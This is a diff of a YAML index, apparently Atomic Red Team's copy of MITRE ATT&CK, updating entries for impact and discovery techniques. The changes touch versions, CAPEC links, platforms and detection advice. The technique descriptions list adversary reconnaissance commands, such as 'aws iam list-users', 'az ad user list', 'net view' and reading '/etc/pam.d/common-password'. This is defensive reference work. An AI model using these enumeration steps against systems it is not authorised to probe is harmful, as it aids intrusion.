- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2020-03-29T01:43:29.320Z'
+ modified: '2020-09-16T15:54:35.429Z'
created: '2020-02-20T15:27:18.581Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_impact_type:
- Availability
@@ -38262,6 +42962,9 @@ impact:
- source_name: mitre-attack
external_id: T1498.002
url: https://attack.mitre.org/techniques/T1498/002
+ - external_id: CAPEC-490
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/490.html
- source_name: Cloudflare ReflectionDoS May 2017
url: https://blog.cloudflare.com/reflections-on-reflections/
description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
@@ -38301,7 +43004,7 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2020-03-23T12:55:30.119Z'
+ modified: '2020-09-16T15:58:18.490Z'
created: '2020-03-02T20:08:03.691Z'
x_mitre_data_sources:
- Sensor health and status
@@ -38321,7 +43024,7 @@ impact:
the lead time may be small and the indicator of an event availability of the
network or service drops. The analysis tools mentioned can then be used to
determine the type of DoS causing the outage and help with remediation.'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_impact_type:
- Availability
@@ -38468,6 +43171,15 @@ impact:
- source_name: mitre-attack
external_id: T1499.002
url: https://attack.mitre.org/techniques/T1499/002
+ - external_id: CAPEC-488
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/488.html
+ - external_id: CAPEC-489
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/489.html
+ - external_id: CAPEC-528
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/528.html
- source_name: Arbor AnnualDoSreport Jan 2018
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
@@ -38501,9 +43213,9 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2020-03-29T01:52:53.947Z'
+ modified: '2020-09-16T15:56:03.131Z'
created: '2020-02-20T15:31:43.613Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_impact_type:
- Availability
@@ -38573,25 +43285,28 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2020-07-14T19:34:47.636Z'
+ modified: '2020-07-24T15:36:08.042Z'
created: '2019-03-29T19:00:55.901Z'
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
+ - Linux
+ - macOS
x_mitre_permissions_required:
- Administrator
- SYSTEM
- User
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_detection: |-
Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
- Monitor Registry edits for modifications to services and startup programs that correspond to services of high importance. Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at HKLM\SYSTEM\CurrentControlSet\Services.
+ Monitor for edits for modifications to services and startup programs that correspond to services of high importance. Look for changes to services that do not correlate with known software, patch cycles, etc. Windows service information is stored in the Registry at HKLM\SYSTEM\CurrentControlSet\Services. Systemd service unit files are stored within the /etc/systemd/system, /usr/lib/systemd/system/, and /home/.config/systemd/user/ directories, as well as associated symbolic links.
Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
x_mitre_data_sources:
+ - File monitoring
- Process command-line parameters
- Process monitoring
- Windows Registry
@@ -38713,6 +43428,21 @@ impact:
atomic_tests: []
T1529:
technique:
+ created: '2019-10-04T20:42:28.541Z'
+ modified: '2020-03-27T21:18:48.149Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ type: attack-pattern
+ id: attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc
+ description: |-
+ Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
+
+ Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)
+ name: System Shutdown/Reboot
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1529
@@ -38729,42 +43459,27 @@ impact:
url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: System Shutdown/Reboot
- description: |-
- Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
-
- Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)
- id: attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
- modified: '2020-03-27T21:18:48.149Z'
- created: '2019-10-04T20:42:28.541Z'
- x_mitre_is_subtechnique: false
- x_mitre_detection: Use process monitoring to monitor the execution and command
- line parameters of binaries involved in shutting down or rebooting systems.
- Windows event logs may also designate activity associated with a shutdown/reboot,
- ex. Event ID 1074 and 6006.
- x_mitre_version: '1.0'
- x_mitre_impact_type:
- - Availability
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_data_sources:
+ - Windows event logs
+ - Process command-line parameters
+ - Process monitoring
x_mitre_permissions_required:
- User
- Administrator
- root
- SYSTEM
- x_mitre_data_sources:
- - Windows event logs
- - Process command-line parameters
- - Process monitoring
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_version: '1.0'
+ x_mitre_detection: Use process monitoring to monitor the execution and command
+ line parameters of binaries involved in shutting down or rebooting systems.
+ Windows event logs may also designate activity associated with a shutdown/reboot,
+ ex. Event ID 1074 and 6006.
+ x_mitre_is_subtechnique: false
identifier: T1529
atomic_tests:
- name: Shutdown System - Windows
@@ -38972,13 +43687,16 @@ discovery:
- source_name: mitre-attack
external_id: T1087
url: https://attack.mitre.org/techniques/T1087
+ - external_id: CAPEC-575
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/575.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- modified: '2020-03-26T15:27:59.127Z'
+ modified: '2020-09-16T15:10:18.260Z'
created: '2017-05-31T21:31:06.988Z'
x_mitre_is_subtechnique: false
x_mitre_platforms:
@@ -39006,7 +43724,7 @@ discovery:
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Travis Smith, Tripwire
- x_mitre_version: '2.1'
+ x_mitre_version: '2.2'
atomic_tests: []
T1010:
technique:
@@ -39256,6 +43974,16 @@ discovery:
Directory Leaks via Azure. Retrieved October 6, 2019.
url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
source_name: Black Hills Red Teaming MS AD Azure, 2018
+ - source_name: AWS List Roles
+ description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+ - source_name: AWS List Users
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+ description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+ - source_name: Google Cloud - IAM Servie Accounts List API
+ url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+ description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+ August 4, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -39263,22 +43991,32 @@ discovery:
description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
accounts are those created and configured by an organization for use by users,
remote support, services, or for administration of resources within a cloud
- service provider of SaaS application.\n\nWith authenticated access there are
+ service provider or SaaS application.\n\nWith authenticated access there are
several tools that can be used to find accounts. The Get-MsolRoleMember
PowerShell cmdlet can be used to obtain account names given a role or permissions
- group.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance)\n\nAzure
- CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated
- access to a domain. The command az ad user list will list all
- users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red
- Teaming MS AD Azure, 2018) "
+ group in Office 365.(Citation: Microsoft msolrolemember)(Citation: GitHub
+ Raindance) The Azure CLI (AZ CLI) also provides an interface to obtain user
+ accounts with authenticated access to a domain. The command az ad user
+ list will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation:
+ Black Hills Red Teaming MS AD Azure, 2018) \n\nThe AWS command aws iam
+ list-users may be used to obtain a list of users in the current account
+ while aws iam list-roles can obtain IAM roles that have a specified
+ path prefix.(Citation: AWS List Roles)(Citation: AWS List Users) In GCP, gcloud
+ iam service-accounts list and gcloud projects get-iam-policy
+ may be used to obtain a listing of service accounts and users in a project.(Citation:
+ Google Cloud - IAM Servie Accounts List API)"
id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- modified: '2020-03-13T20:05:15.448Z'
+ modified: '2020-08-13T16:53:55.390Z'
created: '2020-02-21T21:08:36.570Z'
+ x_mitre_contributors:
+ - Praetorian
x_mitre_data_sources:
+ - Stackdriver logs
+ - AWS CloudTrail logs
- Azure activity logs
- Office 365 account logs
- Process monitoring
@@ -39286,10 +44024,10 @@ discovery:
x_mitre_permissions_required:
- User
x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+ Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information.
- x_mitre_version: '1.0'
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_platforms:
- AWS
@@ -39334,9 +44072,12 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- modified: '2020-03-12T19:25:12.782Z'
+ modified: '2020-10-08T17:34:39.077Z'
created: '2020-02-21T21:15:33.222Z'
x_mitre_data_sources:
+ - GCP audit logs
+ - Stackdriver logs
+ - AWS CloudTrail logs
- Azure activity logs
- Office 365 account logs
- API monitoring
@@ -39348,11 +44089,83 @@ discovery:
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity.
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Office 365
- Azure AD
+ - GCP
+ - SaaS
+ - Azure
+ - AWS
+ atomic_tests: []
+ T1580:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1580
+ url: https://attack.mitre.org/techniques/T1580
+ - source_name: Amazon Describe Instance
+ url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
+ description: Amazon. (n.d.). describe-instance-information. Retrieved March
+ 3, 2020.
+ - source_name: Amazon Describe Instances API
+ url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
+ description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+ - source_name: Google Compute Instances
+ url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
+ description: Google. (n.d.). gcloud compute instances list. Retrieved May
+ 26, 2020.
+ - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+ source_name: Microsoft AZ CLI
+ - source_name: Expel IO Evil in AWS
+ url: https://expel.io/blog/finding-evil-in-aws/
+ description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
+ Evil in AWS. Retrieved June 25, 2020.
+ - source_name: Mandiant M-Trends 2020
+ url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Cloud Infrastructure Discovery
+ description: |-
+ An adversary may attempt to discover resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+ Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, as well as the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project(Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI)
+
+ An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020) Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+ id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ modified: '2020-09-17T16:41:23.267Z'
+ created: '2020-08-20T17:51:25.671Z'
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+ components. Monitor logs for actions that could be taken to gather information
+ about cloud infrastructure, including the use of discovery API calls by new
+ or unexpected users. To reduce false positives, valid change management procedures
+ could introduce a known identifier that is logged with the change (e.g., tag
+ or header) if supported by the cloud provider, to help distinguish valid,
+ expected actions from malicious ones.
+ x_mitre_data_sources:
+ - GCP audit logs
+ - Stackdriver logs
+ - AWS CloudTrail logs
+ - Azure activity logs
+ x_mitre_platforms:
+ - AWS
+ - Azure
+ - GCP
atomic_tests: []
T1538:
technique:
@@ -39914,12 +44727,6 @@ discovery:
name: command_prompt
T1482:
technique:
- created: '2019-02-14T16:15:05.974Z'
- modified: '2020-03-26T16:13:21.085Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- type: attack-pattern
external_references:
- source_name: mitre-attack
external_id: T1482
@@ -39934,7 +44741,7 @@ discovery:
Trust Tickets to Spoof Access across Active Directory Trusts. Retrieved
February 14, 2019.
- source_name: Harmj0y Domain Trusts
- url: 'http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/ '
+ url: http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/
description: Schroeder, W. (2017, October 30). A Guide to Attacking Domain
Trusts. Retrieved February 14, 2019.
- source_name: Microsoft Operation Wilysupply
@@ -39963,6 +44770,12 @@ discovery:
[Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
id: attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ modified: '2020-09-17T18:26:17.858Z'
+ created: '2019-02-14T16:15:05.974Z'
x_mitre_version: '1.1'
x_mitre_permissions_required:
- User
@@ -40165,49 +44978,55 @@ discovery:
T1083:
technique:
created: '2017-05-31T21:31:04.710Z'
- modified: '2020-03-26T17:18:36.857Z'
+ modified: '2020-09-16T16:02:16.770Z'
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
type: attack-pattern
- id: attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: File and Directory Discovery
- description: |-
- Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
- Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1083
url: https://attack.mitre.org/techniques/T1083
+ - external_id: CAPEC-127
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/127.html
+ - external_id: CAPEC-497
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/497.html
- url: http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
description: Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers.
Retrieved February 2, 2016.
source_name: Windows Commands JPCERT
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_system_requirements:
- - Some folders may require Administrator, SYSTEM or specific user depending
- on permission levels and access controls
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.
+ description: |-
+ Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ Many command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).
+ name: File and Directory Discovery
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- File monitoring
- Process monitoring
- Process command-line parameters
- x_mitre_version: '1.2'
- x_mitre_is_subtechnique: false
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_system_requirements:
+ - Some folders may require Administrator, SYSTEM or specific user depending
+ on permission levels and access controls
identifier: T1083
atomic_tests:
- name: File and Directory Discovery (cmd.exe)
@@ -40761,13 +45580,7 @@ discovery:
Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039)
can be used to query a remote system for available shared drives using the
net view \\\\remotesystem command. It can also be used to query
- shared drives on the local system using net share.\n\nCloud virtual
- networks may contain remote network shares or file storage services accessible
- to an adversary after they have obtained access to a system. For example,
- AWS, GCP, and Azure support creation of Network File System (NFS) shares and
- Server Message Block (SMB) shares that may be mapped on endpoint or cloud-based
- systems.(Citation: Amazon Creating an NFS File Share)(Citation: Google File
- servers on Compute Engine)"
+ shared drives on the local system using net share."
external_references:
- source_name: mitre-attack
external_id: T1135
@@ -40783,21 +45596,13 @@ discovery:
description: Microsoft. (n.d.). Share a Folder or Drive. Retrieved June 30,
2017.
source_name: TechNet Shared Folder
- - source_name: Amazon Creating an NFS File Share
- url: https://docs.aws.amazon.com/storagegateway/latest/userguide/CreatingAnNFSFileShare.html
- description: Amazon. (n.d.). Creating an NFS File Share. Retrieved October
- 23, 2019.
- - source_name: Google File servers on Compute Engine
- url: https://cloud.google.com/solutions/filers-on-compute-engine
- description: Google Cloud. (2019, October 10). File servers on Compute Engine.
- Retrieved October 23, 2019.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- modified: '2020-03-15T00:59:10.149Z'
+ modified: '2020-10-07T18:10:06.463Z'
created: '2017-12-14T16:46:06.044Z'
x_mitre_is_subtechnique: false
x_mitre_contributors:
@@ -40807,22 +45612,17 @@ discovery:
x_mitre_platforms:
- macOS
- Windows
- - AWS
- - GCP
- - Azure
- Linux
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
-
- In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be sufficient due to benign use during normal operations.
x_mitre_data_sources:
- Process monitoring
- Process command-line parameters
- Network protocol analysis
- Process use of network
- x_mitre_version: '2.1'
+ x_mitre_version: '3.0'
identifier: T1135
atomic_tests:
- name: Network Share Discovery
@@ -41084,7 +45884,7 @@ discovery:
description: |-
Adversaries may attempt to access detailed information about the password policy used within an enterprise network. Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This would help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
- Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies.(Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)
+ Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies.(Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)
external_references:
- source_name: mitre-attack
external_id: T1201
@@ -41103,7 +45903,7 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- modified: '2020-03-26T17:17:42.457Z'
+ modified: '2020-09-29T14:48:07.227Z'
created: '2018-04-18T17:59:24.739Z'
x_mitre_is_subtechnique: false
x_mitre_platforms:
@@ -41123,7 +45923,7 @@ discovery:
- Process monitoring
x_mitre_contributors:
- Sudhanshu Chauhan, @Sudhanshu_C
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
identifier: T1201
atomic_tests:
- name: Examine password complexity policy - Ubuntu
@@ -41279,12 +46079,6 @@ discovery:
atomic_tests: []
T1069:
technique:
- created: '2017-05-31T21:30:55.471Z'
- modified: '2020-03-26T17:48:28.002Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- type: attack-pattern
id: attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Permission Groups Discovery
@@ -41301,6 +46095,12 @@ discovery:
url: https://capec.mitre.org/data/definitions/576.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ modified: '2020-10-08T17:36:01.675Z'
+ created: '2017-05-31T21:30:55.471Z'
x_mitre_is_subtechnique: false
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
@@ -41321,22 +46121,26 @@ discovery:
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
x_mitre_data_sources:
+ - Stackdriver logs
+ - GCP audit logs
+ - AWS CloudTrail logs
- Azure activity logs
- Office 365 account logs
- API monitoring
- Process monitoring
- Process command-line parameters
- x_mitre_version: '2.1'
+ x_mitre_version: '2.2'
atomic_tests: []
T1057:
technique:
- id: attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Process Discovery
- description: |-
- Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
- In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc.
+ created: '2017-05-31T21:30:48.728Z'
+ modified: '2020-03-26T18:05:53.130Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1057
@@ -41344,34 +46148,33 @@ discovery:
- external_id: CAPEC-573
source_name: capec
url: https://capec.mitre.org/data/definitions/573.html
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-03-26T18:05:53.130Z'
- created: '2017-05-31T21:30:48.728Z'
- x_mitre_is_subtechnique: false
- x_mitre_system_requirements:
- - Administrator, SYSTEM may provide better process ownership details
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+ description: |-
+ Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
